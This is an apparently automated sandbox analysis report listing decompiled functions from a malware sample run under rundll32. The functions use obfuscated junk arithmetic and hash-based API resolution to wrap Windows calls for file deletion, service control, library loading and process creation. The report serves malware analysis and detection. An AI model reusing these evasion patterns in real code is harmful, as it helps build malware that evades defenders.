                                          • Associated: 0000000A.00000002.2099594218.000000000026C000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: FileHandleInformation
                                          • String ID:
                                          • API String ID: 3935143524-0
                                          • Opcode ID: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
                                          • Instruction ID: 460edcf3472d15c42e110d486e6de1c221151cd228eaa9cab750971bf5c0b1cf
                                          • Opcode Fuzzy Hash: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
                                          • Instruction Fuzzy Hash: B5018BB294030CFBEF45DF90DD06E9E7BB5EF18704F108188FA09261A0D3B25E20AB61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0026AA3C, Relevance: 1.5, APIs: 1, Instructions: 34fileCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 58%
                                          			E0026AA3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				signed int _v8;
				unsigned int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0025602B(_t21);
				_v12 = 0xcc49;
				_v12 = _v12 << 6;
				_v12 = _v12 >> 2;
				_v12 = _v12 ^ 0x000ca988;
				_v8 = 0x5d85;
				_v8 = _v8 | 0xb9d19a55;
				_v8 = _v8 * 0xd;
				_v8 = _v8 ^ 0x6fa87272;
				E002607A9(0x330b490b, 0x9164b7cc, __ecx, __ecx, 0xb9);
				_t27 = DeleteFileW(_a12); // executed
				return _t27;
			}







                                          0x0026aa3f
                                          0x0026aa40
                                          0x0026aa41
                                          0x0026aa44
                                          0x0026aa47
                                          0x0026aa4b
                                          0x0026aa4c
                                          0x0026aa51
                                          0x0026aa5b
                                          0x0026aa64
                                          0x0026aa68
                                          0x0026aa6f
                                          0x0026aa76
                                          0x0026aa8d
                                          0x0026aa90
                                          0x0026aa9d
                                          0x0026aaa8
                                          0x0026aaad

                                          APIs
                                          • DeleteFileW.KERNELBASE(?,?,?,?,A6E18774,?,?), ref: 0026AAA8
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.2099552528.0000000000251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                          • Associated: 0000000A.00000002.2099542294.0000000000250000.00000004.00000001.sdmp Download File
                                          • Associated: 0000000A.00000002.2099594218.000000000026C000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: DeleteFile
                                          • String ID:
                                          • API String ID: 4033686569-0
                                          • Opcode ID: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
                                          • Instruction ID: 626853f40b83577a8709cb0c6364f774f1d7abf900c33c90cba9e43961ac41ed
                                          • Opcode Fuzzy Hash: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
                                          • Instruction Fuzzy Hash: 90F069B191020CFFDF08EF94DD4A89EBFB4EB40304F108088F805A7250D3B29B649B50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00255FB2, Relevance: 1.5, APIs: 1, Instructions: 33serviceCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 70%
                                          			E00255FB2(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E0025602B(_t21);
				_v12 = 0x33d;
				_v12 = _v12 + 0xc3dc;
				_v12 = _v12 | 0x39ccfb02;
				_v12 = _v12 ^ 0x39ccf342;
				_v8 = 0xe8d9;
				_v8 = _v8 * 0x16;
				_v8 = _v8 | 0x4145347f;
				_v8 = _v8 ^ 0x9035ef96;
				_v8 = _v8 ^ 0xd1609914;
				E002607A9(0x6b3db31e, 0x2c3ac9a2, __ecx, __ecx, 0x1d5);
				_t27 = CloseServiceHandle(_a4); // executed
				return _t27;
			}







                                          0x00255fb5
                                          0x00255fb6
                                          0x00255fb7
                                          0x00255fbb
                                          0x00255fbc
                                          0x00255fc1
                                          0x00255fcb
                                          0x00255fd7
                                          0x00255fde
                                          0x00255fe5
                                          0x00255ffc
                                          0x00255fff
                                          0x00256006
                                          0x0025600d
                                          0x0025601a
                                          0x00256025
                                          0x0025602a

                                          APIs
                                          • CloseServiceHandle.ADVAPI32(39CCF342), ref: 00256025
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.2099552528.0000000000251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                          • Associated: 0000000A.00000002.2099542294.0000000000250000.00000004.00000001.sdmp Download File
                                          • Associated: 0000000A.00000002.2099594218.000000000026C000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: CloseHandleService
                                          • String ID:
                                          • API String ID: 1725840886-0
                                          • Opcode ID: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
                                          • Instruction ID: 318acac94787bcf4cdffac460b5c7f0bd8662ffd341962fab0f8f4256a71e840
                                          • Opcode Fuzzy Hash: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
                                          • Instruction Fuzzy Hash: DCF04FB0C11208FFDB08DFA0E94689EBFB8EB40300F208198E809A7260E7729F559F54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          Analysis Process: rundll32.exe PID: 2440 Parent PID: 960 rundll32.exeCOMMON

                                          Executed Functions

                                          Function 002D2959, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 62%
                                          			E002D2959(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16) {
				unsigned int _v8;
				signed int _v12;
				void* _t30;
				void* _t39;
				signed int _t41;
				signed int _t42;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				_push(0);
				E002D602B(_t30);
				_v12 = 0x5e3c;
				_t41 = 0x63;
				_v12 = _v12 / _t41;
				_t42 = 0x2f;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x000064be;
				_v8 = 0x74da;
				_v8 = _v8 | 0xfefeeaea;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 ^ 0x000fb531;
				E002E07A9(0x44082a3f, 0x2c3ac9a2, _t42, _t42, 0x18a);
				_t39 = OpenSCManagerW(0, 0, _a16); // executed
				return _t39;
			}









                                          0x002d295f
                                          0x002d2964
                                          0x002d2967
                                          0x002d296a
                                          0x002d296d
                                          0x002d296e
                                          0x002d296f
                                          0x002d2977
                                          0x002d2985
                                          0x002d298a
                                          0x002d2992
                                          0x002d299a
                                          0x002d29a2
                                          0x002d29a9
                                          0x002d29b0
                                          0x002d29b7
                                          0x002d29bb
                                          0x002d29cf
                                          0x002d29dc
                                          0x002d29e2

                                          APIs
                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 002D29DC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2100964002.00000000002D1000.00000020.00000001.sdmp, Offset: 002D0000, based on PE: true
                                          • Associated: 0000000B.00000002.2100956087.00000000002D0000.00000004.00000001.sdmp Download File
                                          • Associated: 0000000B.00000002.2100999105.00000000002EC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: ManagerOpen
                                          • String ID: <^
                                          • API String ID: 1889721586-3203995635
                                          • Opcode ID: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
                                          • Instruction ID: c638c432c40ddb02de9cd7892f1b44e95816461b69e2a8d3fafd893ec86d0a10
                                          • Opcode Fuzzy Hash: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
                                          • Instruction Fuzzy Hash: 8A016D72A00108BFEB14DF95DC4A8DFBFB6EF48310F108089F508A6250D7B65F619B91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 002DC6C7, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 58%
                                          			E002DC6C7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t29;
				intOrPtr* _t33;
				void* _t34;

				E002D602B(_t29);
				_v28 = 0x4fe02f;
				_v24 = 0x232390;
				_v20 = 0xf8460;
				_v16 = 0;
				_v12 = 0xf625;
				_v12 = _v12 >> 6;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 + 0xffffcc6f;
				_v12 = _v12 ^ 0xffffa5b6;
				_v8 = 0xe5cd;
				_v8 = _v8 + 0xffffae4d;
				_v8 = _v8 | 0xf8bbefe7;
				_v8 = _v8 ^ 0xf8bbcc9a;
				_t33 = E002E07A9(0x59a47438, 0xd39e34db, __ecx, __ecx, 0x1e9);
				_t34 =  *_t33(0, _a16, 0, 0, _a4, __ecx, __edx, _a4, 0, _a12, _a16, _a20, 0, 0); // executed
				return _t34;
			}












                                          0x002dc6e1
                                          0x002dc6e6
                                          0x002dc6f0
                                          0x002dc6fc
                                          0x002dc703
                                          0x002dc706
                                          0x002dc70d
                                          0x002dc711
                                          0x002dc715
                                          0x002dc71c
                                          0x002dc723
                                          0x002dc72a
                                          0x002dc731
                                          0x002dc738
                                          0x002dc751
                                          0x002dc762
                                          0x002dc768

                                          APIs
                                          • SHGetFolderPathW.SHELL32(00000000,00232390,00000000,00000000,FFFFA5B6), ref: 002DC762
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2100964002.00000000002D1000.00000020.00000001.sdmp, Offset: 002D0000, based on PE: true
                                          • Associated: 0000000B.00000002.2100956087.00000000002D0000.00000004.00000001.sdmp Download File
                                          • Associated: 0000000B.00000002.2100999105.00000000002EC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: FolderPath
                                          • String ID: /O
                                          • API String ID: 1514166925-1923427199
                                          • Opcode ID: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
                                          • Instruction ID: db3ae95af8c4c9ebda3dfdfc0c3d152282b53258ce6c4d73ac6c5c6800bdf77a
                                          • Opcode Fuzzy Hash: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
                                          • Instruction Fuzzy Hash: 821122B290122DBBCB259F95DC498EFBEB8EF04714F108188B90962210D3B14A659BE0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 002D1000, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42libraryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 82%
                                          			E002D1000(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t33;
				struct HINSTANCE__* _t40;
				signed int _t42;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E002D602B(_t33);
				_v16 = _v16 & 0x00000000;
				_v24 = 0x1b2eda;
				_v20 = 0x33a3b7;
				_v12 = 0x98c;
				_v12 = _v12 + 0xb426;
				_v12 = _v12 + 0x5beb;
				_t42 = 0x63;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x00000fce;
				_v8 = 0x120e;
				_v8 = _v8 + 0xfffffcb8;
				_v8 = _v8 + 0xffffefaa;
				_v8 = _v8 >> 5;
				_v8 = _v8 ^ 0x07ff9a02;
				E002E07A9(0xa900db79, 0x9164b7cc, _t42, _t42, 0xdd);
				_t40 = LoadLibraryW(_a12); // executed
				return _t40;
			}











                                          0x002d1006
                                          0x002d1009
                                          0x002d100c
                                          0x002d1011
                                          0x002d1016
                                          0x002d101d
                                          0x002d1026
                                          0x002d102d
                                          0x002d1034
                                          0x002d103b
                                          0x002d1047
                                          0x002d104f
                                          0x002d1057
                                          0x002d105e
                                          0x002d1065
                                          0x002d106c
                                          0x002d1073
                                          0x002d1077
                                          0x002d108b
                                          0x002d1096
                                          0x002d109b

                                          APIs
                                          • LoadLibraryW.KERNEL32(0033A3B7), ref: 002D1096
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2100964002.00000000002D1000.00000020.00000001.sdmp, Offset: 002D0000, based on PE: true
                                          • Associated: 0000000B.00000002.2100956087.00000000002D0000.00000004.00000001.sdmp Download File
                                          • Associated: 0000000B.00000002.2100999105.00000000002EC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID: [
                                          • API String ID: 1029625771-3431493590
                                          • Opcode ID: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
                                          • Instruction ID: 6fd2fd3ccfee7344cb4ac8b8896a3058e99056bc09d58c8258d7b5415594f2a1
                                          • Opcode Fuzzy Hash: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
                                          • Instruction Fuzzy Hash: DB015BB6D01308BBDF04DF94C94A5DEBBB1AB54318F108188E41466291D3B19B649B91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 002D4859, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E002D4859() {
				signed int _v8;
				signed int _v12;
				void* _t22;

				_v12 = 0xafe2;
				_v12 = _v12 * 0x42;
				_v12 = _v12 + 0xffffdd89;
				_v12 = _v12 ^ 0x002d198d;
				_v8 = 0x5b09;
				_v8 = _v8 | 0xa1ea9544;
				_v8 = _v8 * 0x12;
				_v8 = _v8 ^ 0x6283d9c1;
				E002E07A9(0xc44181ea, 0x9164b7cc, _t22, _t22, 0x1a5);
				ExitProcess(0);
			}






                                          0x002d485e
                                          0x002d487a
                                          0x002d487d
                                          0x002d4884
                                          0x002d488b
                                          0x002d4892
                                          0x002d489d
                                          0x002d48a0
                                          0x002d48ad
                                          0x002d48b7

                                          APIs
                                          • ExitProcess.KERNELBASE(00000000), ref: 002D48B7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2100964002.00000000002D1000.00000020.00000001.sdmp, Offset: 002D0000, based on PE: true
                                          • Associated: 0000000B.00000002.2100956087.00000000002D0000.00000004.00000001.sdmp Download File
                                          • Associated: 0000000B.00000002.2100999105.00000000002EC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: ExitProcess
                                          • String ID: [
                                          • API String ID: 621844428-1822564810
                                          • Opcode ID: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
                                          • Instruction ID: 86ba2a0eb99778ba98e78ab0eda91687ba8772f974a2f1b7d80c559873d617bc
                                          • Opcode Fuzzy Hash: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
                                          • Instruction Fuzzy Hash: 7BF017B0A55209FBDB04CFE8CA9699EBFB9EB40301F20818CE444B7290E3B15F519B50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 002E4F7D, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 32COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 66%
                                          			E002E4F7D(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t17;
				int _t24;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E002D602B(_t17);
				_v12 = 0xddd8;
				_v12 = _v12 * 0x48;
				_v12 = _v12 ^ 0x003e66d8;
				_v8 = 0xcb35;
				_v8 = _v8 ^ 0x7b88573c;
				_v8 = _v8 * 0x59;
				_v8 = _v8 ^ 0xf27e4a21;
				E002E07A9(0x6d6c237b, 0x9164b7cc, __ecx, __ecx, 0xce);
				_t24 = CloseHandle(_a4); // executed
				return _t24;
			}







                                          0x002e4f80
                                          0x002e4f81
                                          0x002e4f82
                                          0x002e4f86
                                          0x002e4f87
                                          0x002e4f8c
                                          0x002e4fa5
                                          0x002e4fa8
                                          0x002e4faf
                                          0x002e4fb6
                                          0x002e4fc7
                                          0x002e4fca
                                          0x002e4fd7
                                          0x002e4fe2
                                          0x002e4fe7

                                          APIs
                                          • CloseHandle.KERNELBASE(003E66D8), ref: 002E4FE2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2100964002.00000000002D1000.00000020.00000001.sdmp, Offset: 002D0000, based on PE: true
                                          • Associated: 0000000B.00000002.2100956087.00000000002D0000.00000004.00000001.sdmp Download File
                                          • Associated: 0000000B.00000002.2100999105.00000000002EC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: CloseHandle
                                          • String ID: {#lm
                                          • API String ID: 2962429428-1564096886
                                          • Opcode ID: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
                                          • Instruction ID: 856ded7637982392f38c52d08aad1dc8ae4766ff0a34144981bf64a4fb693a18
                                          • Opcode Fuzzy Hash: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
                                          • Instruction Fuzzy Hash: 42F037B081120CFFDF04DFA4D98689EBFBAEB44300F208199E804AB250D3715F519B50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 002E976F, Relevance: 1.6, APIs: 1, Instructions: 63processCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 21%
                                          			E002E976F(void* __ecx, struct _PROCESS_INFORMATION* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, struct _STARTUPINFOW* _a20, int _a24, intOrPtr _a28, intOrPtr _a40, intOrPtr _a44, intOrPtr _a52, intOrPtr _a56, WCHAR* _a60, WCHAR* _a68) {
				unsigned int _v8;
				signed int _v12;
				void* _t34;
				int _t39;
				struct _PROCESS_INFORMATION* _t48;

				_push(__ecx);
				_push(__ecx);
				_t48 = __edx;
				_push(0);
				_push(_a68);
				_push(0);
				_push(_a60);
				_push(_a56);
				_push(_a52);
				_push(0);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E002D602B(_t34);
				_v12 = 0xaff9;
				_v12 = _v12 | 0xcee54bd1;
				_v12 = _v12 + 0x6ed6;
				_v12 = _v12 ^ 0xcee61221;
				_v8 = 0x6229;
				_v8 = _v8 ^ 0x42aa9f31;
				_v8 = _v8 >> 2;
				_v8 = _v8 ^ 0x10aad83f;
				E002E07A9(0xf0de9e9f, 0x9164b7cc, __ecx, __ecx, 0x155);
				_t39 = CreateProcessW(_a68, _a60, 0, 0, _a24, 0, 0, 0, _a20, _t48); // executed
				return _t39;
			}








                                          0x002e9772
                                          0x002e9773
                                          0x002e9778
                                          0x002e977a
                                          0x002e977b
                                          0x002e977e
                                          0x002e977f
                                          0x002e9782
                                          0x002e9785
                                          0x002e9788
                                          0x002e9789
                                          0x002e978c
                                          0x002e978f
                                          0x002e9790
                                          0x002e9791
                                          0x002e9794
                                          0x002e9797
                                          0x002e979a
                                          0x002e979d
                                          0x002e97a0
                                          0x002e97a3
                                          0x002e97a6
                                          0x002e97a7
                                          0x002e97a8
                                          0x002e97ad
                                          0x002e97b7
                                          0x002e97c3
                                          0x002e97ca
                                          0x002e97d1
                                          0x002e97d8
                                          0x002e97df
                                          0x002e97e3
                                          0x002e97fc
                                          0x002e9816
                                          0x002e981d

                                          APIs
                                          • CreateProcessW.KERNEL32(002D591A,?,00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,002D591A), ref: 002E9816
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2100964002.00000000002D1000.00000020.00000001.sdmp, Offset: 002D0000, based on PE: true
                                          • Associated: 0000000B.00000002.2100956087.00000000002D0000.00000004.00000001.sdmp Download File
                                          • Associated: 0000000B.00000002.2100999105.00000000002EC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: CreateProcess
                                          • String ID:
                                          • API String ID: 963392458-0
                                          • Opcode ID: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
                                          • Instruction ID: cf482899311c871345eaa683254743f7d4d0d70c4dadbbfae6173e4374587679
                                          • Opcode Fuzzy Hash: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
                                          • Instruction Fuzzy Hash: 7E11B372911188BFDF199F96DC0ACDF7F7AEF89750F108148FA1556120D2728A61EBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 002DB566, Relevance: 1.6, APIs: 1, Instructions: 55fileCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 31%
                                          			E002DB566(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, long _a32, intOrPtr _a36, intOrPtr _a40, long _a44, WCHAR* _a48) {
				unsigned int _v8;
				signed int _v12;
				void* _t32;
				void* _t38;
				long _t47;

				_push(__ecx);
				_push(__ecx);
				_push(_a48);
				_t47 = __edx;
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(0);
				E002D602B(_t32);
				_v8 = 0xfd14;
				_v8 = _v8 >> 4;
				_v8 = _v8 * 0x7a;
				_v8 = _v8 >> 9;
				_v8 = _v8 ^ 0x00002bef;
				_v12 = 0x4f26;
				_v12 = _v12 | 0xe7e97f76;
				_v12 = _v12 ^ 0xe7e94dbb;
				E002E07A9(0xfbdf2264, 0x9164b7cc, __ecx, __ecx, 0x1bd);
				_t38 = CreateFileW(_a48, _a12, _t47, 0, _a44, _a32, 0); // executed
				return _t38;
			}








                                          0x002db569
                                          0x002db56a
                                          0x002db56d
                                          0x002db572
                                          0x002db574
                                          0x002db577
                                          0x002db57a
                                          0x002db57d
                                          0x002db580
                                          0x002db583
                                          0x002db586
                                          0x002db587
                                          0x002db58a
                                          0x002db58d
                                          0x002db590
                                          0x002db593
                                          0x002db594
                                          0x002db595
                                          0x002db59a
                                          0x002db5a4
                                          0x002db5b8
                                          0x002db5c0
                                          0x002db5c4
                                          0x002db5cb
                                          0x002db5d2
                                          0x002db5d9
                                          0x002db5e6
                                          0x002db5fd
                                          0x002db604

                                          APIs
                                          • CreateFileW.KERNELBASE(002E0668,?,?,00000000,?,?,00000000,?,?,?,047BBE06,002E0668,?,?,?,?), ref: 002DB5FD
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2100964002.00000000002D1000.00000020.00000001.sdmp, Offset: 002D0000, based on PE: true
                                          • Associated: 0000000B.00000002.2100956087.00000000002D0000.00000004.00000001.sdmp Download File
                                          • Associated: 0000000B.00000002.2100999105.00000000002EC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          • Opcode ID: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
                                          • Instruction ID: 4b2413f2745c54bb51fd8f1b526349412216201b80e6b8176d49e1a4267cd40a
                                          • Opcode Fuzzy Hash: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
                                          • Instruction Fuzzy Hash: 6611C372801248BBDF16DF95DD06CEE7F7AFF89314F148198FA1862120D3729A60EB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 002E981E, Relevance: 1.5, APIs: 1, Instructions: 43memoryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 54%
                                          			E002E981E(long __ecx, void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				void* _t22;
				void* _t28;
				void* _t34;
				long _t37;

				_push(__ecx);
				_push(__ecx);
				_push(_a16);
				_t34 = __edx;
				_t37 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E002D602B(_t22);
				_v12 = 0xe68;
				_v12 = _v12 * 0x39;
				_v12 = _v12 ^ 0xd1b1d871;
				_v12 = _v12 ^ 0xd1b2fb7e;
				_v8 = 0x629e;
				_v8 = _v8 + 0xfffff5da;
				_v8 = _v8 | 0xbef7b77b;
				_v8 = _v8 ^ 0xbef79fc3;
				E002E07A9(0xd2423672, 0x9164b7cc, __ecx, __ecx, 0x1ff);
				_t28 = RtlAllocateHeap(_t34, _a4, _t37); // executed
				return _t28;
			}









                                          0x002e9821
                                          0x002e9822
                                          0x002e9825
                                          0x002e9828
                                          0x002e982a
                                          0x002e982c
                                          0x002e982f
                                          0x002e9832
                                          0x002e9835
                                          0x002e9836
                                          0x002e9837
                                          0x002e983c
                                          0x002e9855
                                          0x002e9858
                                          0x002e985f
                                          0x002e9866
                                          0x002e986d
                                          0x002e9874
                                          0x002e987b
                                          0x002e988e
                                          0x002e989b
                                          0x002e98a2

                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000,D1B2FB7E,00000001,?,?,?,002D87F2,0000CAAE,0000510C,AD82F196), ref: 002E989B
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2100964002.00000000002D1000.00000020.00000001.sdmp, Offset: 002D0000, based on PE: true
                                          • Associated: 0000000B.00000002.2100956087.00000000002D0000.00000004.00000001.sdmp Download File
                                          • Associated: 0000000B.00000002.2100999105.00000000002EC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
                                          • Instruction ID: 557b23b88401d9301185e540ffafe084de549d112e806a48190ab98c91cd0c31
                                          • Opcode Fuzzy Hash: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
                                          • Instruction Fuzzy Hash: 0B014876801208BBDB04EF95D8468DFBF79EF85750F108199F918A6220E6715A619BA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 002E7BF4, Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 62%
                                          			E002E7BF4(struct _SHFILEOPSTRUCTW* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				void* _t24;
				int _t31;
				signed int _t33;
				struct _SHFILEOPSTRUCTW* _t40;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_t40 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E002D602B(_t24);
				_v8 = 0xa117;
				_t33 = 0x76;
				_v8 = _v8 / _t33;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x210fe703;
				_v8 = _v8 ^ 0x210fdcea;
				_v12 = 0xf1e9;
				_v12 = _v12 << 9;
				_v12 = _v12 ^ 0x01e3a445;
				E002E07A9(0x6b98377a, 0xd39e34db, _t33, _t33, 0x219);
				_t31 = SHFileOperationW(_t40); // executed
				return _t31;
			}









                                          0x002e7bf7
                                          0x002e7bf8
                                          0x002e7bfa
                                          0x002e7bfd
                                          0x002e7bff
                                          0x002e7c02
                                          0x002e7c06
                                          0x002e7c07
                                          0x002e7c0f
                                          0x002e7c1d
                                          0x002e7c25
                                          0x002e7c2d
                                          0x002e7c31
                                          0x002e7c38
                                          0x002e7c3f
                                          0x002e7c46
                                          0x002e7c4a
                                          0x002e7c5e
                                          0x002e7c67
                                          0x002e7c6d

                                          APIs
                                          • SHFileOperationW.SHELL32(68CF93E9,?,?,?,?,?,?), ref: 002E7C67
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2100964002.00000000002D1000.00000020.00000001.sdmp, Offset: 002D0000, based on PE: true
                                          • Associated: 0000000B.00000002.2100956087.00000000002D0000.00000004.00000001.sdmp Download File
                                          • Associated: 0000000B.00000002.2100999105.00000000002EC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: FileOperation
                                          • String ID:
                                          • API String ID: 3080627654-0
                                          • Opcode ID: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
                                          • Instruction ID: ef79868f55910c6cf371cfda42a754c7fa800d49579ec5a4d81d3592d7e2b535
                                          • Opcode Fuzzy Hash: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
                                          • Instruction Fuzzy Hash: 7F014FB190120CFFEB09DF94C84A8DEBBB5EF44314F108199F40567240E6B15F609B91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 002DF65F, Relevance: 1.5, APIs: 1, Instructions: 40serviceCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 52%
                                          			E002DF65F(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, short* _a12, void* _a16, intOrPtr _a20) {
				unsigned int _v8;
				signed int _v12;
				void* _t24;
				void* _t29;
				int _t35;

				_push(__ecx);
				_push(__ecx);
				_push(_a20);
				_t35 = __ecx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E002D602B(_t24);
				_v12 = 0xd5a7;
				_v12 = _v12 ^ 0x994cba9d;
				_v12 = _v12 ^ 0x994c19d3;
				_v8 = 0xac88;
